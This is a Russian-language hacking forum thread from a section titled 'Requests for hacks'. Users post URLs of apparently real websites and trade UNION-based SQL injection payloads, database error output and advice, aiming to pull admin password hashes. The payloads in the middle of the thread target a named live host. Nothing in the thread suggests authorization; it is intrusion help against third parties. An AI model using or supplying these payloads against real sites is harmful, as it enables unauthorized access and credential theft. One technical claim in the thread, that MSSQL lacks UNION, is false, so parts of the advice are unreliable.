Форум АНТИЧАТ - Помощь Sql Иньекции.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Просьбы о взломах (https://forum.antichat.xyz/forumdisplay.php?f=44)

- - Помощь Sql Иньекции. (https://forum.antichat.xyz/showthread.php?t=36161)

Помощь Sql Иньекции.

Если вы хотите что бы вам быстро оказали помощь оставляте ссыки на предпологаемые вами sql иньекции.

Здесь оставляем ссылки вида.

PHP код:

http://site.ru/index.php?id=[sql]

Все остальные ссылки рассматривать не будут.

ссыки? Блин, Кэш, глаза чуть не сломал пока читал месадж, исправь ошибки, не в обиду

ЗЫ

__http://prod1.cmj.com/articles/display_article.php?id=6547215'

16 колонок, вывод не осилил

Ошибки разные, отсюда делаю вывод что юнион должен работать, иначе бы типы данных игнорились:

Код:

__http://prod1.cmj.com/articles/display_article.php?id=-6547215'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query



__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,nulll--

Invalid column name 'nulll'=====================================================================:::



__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

Column of type (BIT) does not allow nulls. It may not be compared with null



__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,0,null,null,null,null,null--

Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query

Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.

Цитата:

Сообщение от [ cash ]

Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.

нужно использовать convert/aes_decrypt?

cast(TABLE as nvarchar)
cast(TABLE as int)

http://forum.pacan.net/kb.php?mode=cat&cat=23'

Не могу добраться до хэшей админа. Пхпбб.

Помогите заюзать найденный SQL-inj

http://portal.migtel.ru/modules.php?name=Search
Если в поле поиска забито что-товроде 99' скрипт выдаёт явную ошибку. Из префиксов видно что cms - Nuke.
Помогите составить запрос для вытаскивания хэша админа.

а теперь признайтесь ктио туда троянца залил

офтоп
Тоже вот не хотелось новую тему создавать.
офтоп
На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users (post запросе) дайет вот такой ответ:Microsoft JET Database Engine ошибка '80040e14'.
В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов (повторил слово в слово!). Ну короче неправельно выбрано кол. столбцов, насколько я понял из
MS.Press.MCAD.MCSE.MCDB - TOPом и задается кол. столбцов,тока сколька не cтавил TOP, все равно ему мало:),короче не правильный запросик, подскажите че нибудь.
Да насчет INFORMATION_SCHEMA.TABLES в запросе - говорит что "таблицы таблиц" нету.

Цитата:

В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов

жесть :D :D :D :D

Цитата:

На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users

0_о в MSSQL нет оператора UNION